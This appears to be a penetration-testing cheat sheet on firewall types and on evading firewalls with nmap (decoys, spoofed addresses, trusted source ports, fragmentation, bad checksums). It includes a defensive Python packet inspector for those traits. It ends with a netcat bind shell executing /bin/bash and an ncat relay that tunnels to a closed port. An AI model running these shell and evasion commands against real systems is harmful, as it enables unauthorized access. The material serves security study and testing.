Firewall Handling and Bypassing

Types

  • Packet filtering
  • Circuit level gateway
  • Stateful inspection
  • Proxy
  • Next generation firewall
  • Cloud firewall and FWaaS

Rules

  • Firewalls follow rule sets configured like in the examples below

Windows

netsh advfirewall firewall add rule name="muka" dir=in action=allow protocol=tcp localport=57869

Linux

firewall-cmd --zone=public --add-port=57869/tcp

Bypassing Firewalls

  • IP/MAC/Port spoofing
  • Fragmentation, MTU, data length
  • Header modification

nmap

  • nmap offers multiple options that can be used to circumvent firewalls protecting the target we want to connect to.

Spoofing

  • Decoy, -D: interleave the real source address (ME) with chosen or random (RND) addresses. Every port is probed from each of these addresses.
sudo nmap -Pn -D 192.168.0.23,192.168.0.42,ME -F $TARGET_IP
sudo nmap -Pn -D RND,RND,ME -F $TARGET_IP
  • Proxy
sudo nmap -Pn -F --proxies $PROXY_IP $TARGET_IP
  • Spoofed MAC
sudo nmap -Pn -F --spoof-mac $MAC_ADDRESS $TARGET_IP
  • Spoofed IP
sudo nmap -Pn -F -S $ATTACKER_IP $TARGET_IP
  • Port number, select a source port which is whitelisted. Frequently this is 53, 80 or 443
sudo nmap -F --source-port 443 $TARGET_IP
  • Fragmentation, Ethernet header + 20-byte IP header + 8-byte data fragments via -f, or 16-byte fragments via -ff
sudo nmap -Pn -F -f $TARGET_IP
  • MTU, works like fragmentation with a chosen fragment size, -f == --mtu 8
sudo nmap -Pn -F --mtu 8 $TARGET_IP
  • Data length, Ethernet header + IP header + protocol header + random padding of the given number of bytes appended via --data-length
sudo nmap -Pn -F --data-length 64 $TARGET_IP

Header Fields

  • TTL
sudo nmap -Pn -F --ttl 64 $TARGET_IP
  • IP options, --ip-options takes the options as a hex string or one of the following shortcuts

    • Route, R
    • Timestamp, T
    • Route + Timestamp, U
    • Loose source routing, L $IP $IP $IP
    • Strict source routing, S $IP $IP $IP
  • Checksum, craft a bad checksum via --badsum to see how the target handles checksum errors

sudo nmap -Pn -F --badsum $TARGET_IP
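The following is an added example, not part of the compendium: a small Python inspector, written from the detection side, that reports which of the traits left by the nmap options above (tiny fragments from -f/-ff/--mtu, whitelisted source ports, IP options, --badsum checksums) are visible in a raw IPv4 packet. The packets, addresses and the trusted-port list are constructed inline for the demonstration.

```python
import struct

TRUSTED_SRC_PORTS = {53, 80, 443}      # source ports commonly whitelisted (see --source-port)
OPTION_NAMES = {7: "record-route", 68: "timestamp", 131: "loose-source-route", 137: "strict-source-route"}

def ip_checksum(header: bytes) -> int:
    """RFC 791 one's-complement checksum over an IPv4 header whose checksum field is zeroed."""
    total = sum(struct.unpack("!%dH" % (len(header) // 2), header))
    while total >> 16:
        total = (total & 0xFFFF) + (total >> 16)
    return (~total) & 0xFFFF

def build_ipv4(src, dst, payload, ttl=64, flags_frag=0, options=b"", bad_sum=False):
    # Constructed-sample helper: raw IPv4 packet carrying TCP (proto 6) with the requested quirks.
    options += b"\x00" * (-len(options) % 4)            # options are padded to 32-bit words
    ihl = 5 + len(options) // 4
    hdr = struct.pack("!BBHHHBBH4s4s", 0x40 | ihl, 0, ihl * 4 + len(payload), 0x1234,
                      flags_frag, ttl, 6, 0, src, dst) + options
    csum = ip_checksum(hdr) ^ (0xFFFF if bad_sum else 0)  # --badsum style corruption
    return hdr[:10] + struct.pack("!H", csum) + hdr[12:] + payload

def evasion_indicators(pkt: bytes) -> list:
    # Return the evasion traits from this page that are visible in one IPv4 packet.
    ihl = (pkt[0] & 0x0F) * 4
    total_len, _, flags_frag = struct.unpack("!HHH", pkt[2:8])
    found = []
    if ip_checksum(pkt[:10] + b"\x00\x00" + pkt[12:ihl]) != struct.unpack("!H", pkt[10:12])[0]:
        found.append("bad-checksum")                      # --badsum
    frag_off = (flags_frag & 0x1FFF) * 8
    if flags_frag & 0x2000 or frag_off:                   # MF flag set or non-zero offset
        found.append("fragment")
        if total_len - ihl <= 16:
            found.append("tiny-fragment")                 # -f (8 bytes) / -ff (16 bytes) / --mtu 8
    if ihl > 20:
        found.append("ip-option:" + OPTION_NAMES.get(pkt[20], "type-%d" % pkt[20]))  # --ip-options
    if pkt[9] == 6 and frag_off == 0 and len(pkt) >= ihl + 4:
        sport, dport = struct.unpack("!HH", pkt[ihl:ihl + 4])
        if sport in TRUSTED_SRC_PORTS and dport not in TRUSTED_SRC_PORTS:
            found.append("trusted-source-port:%d" % sport)  # --source-port 443
    return found

SRC, DST = bytes([10, 0, 0, 5]), bytes([10, 0, 0, 9])      # constructed addresses
SYN_TO_SSH = struct.pack("!HH", 40000, 22) + b"\x00" * 16   # minimal 20-byte TCP header, ports first
SAMPLES = {                                                  # constructed packets, not a capture
    "plain-syn": build_ipv4(SRC, DST, SYN_TO_SSH),
    "source-port-443": build_ipv4(SRC, DST, struct.pack("!HH", 443, 22) + b"\x00" * 16),
    "nmap-f-first-fragment": build_ipv4(SRC, DST, SYN_TO_SSH[:8], flags_frag=0x2000),
    "badsum": build_ipv4(SRC, DST, SYN_TO_SSH, bad_sum=True),
    "record-route": build_ipv4(SRC, DST, SYN_TO_SSH, options=b"\x07\x0b\x04" + b"\x00" * 8),
}
```

Run `evasion_indicators(SAMPLES[name])` for each sample; only "plain-syn" comes back empty.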

Post FW

After the firewall has been bypassed there are further possible steps to gain a foothold. One of them is to open a bind shell on standard ports which are usually not covered by firewall configurations, like 443 or 80.

  • Hopping, listen via netcat to catch that port
  • Tunneling, relay opened after passing the firewall to connect to the closed port
ncat -lvnp 443 --sh-exec "nc $TARGET_IP 25"
  • Non standard ports, open a bind shell via
nc -lvnp 8888 -e /bin/bash

and connect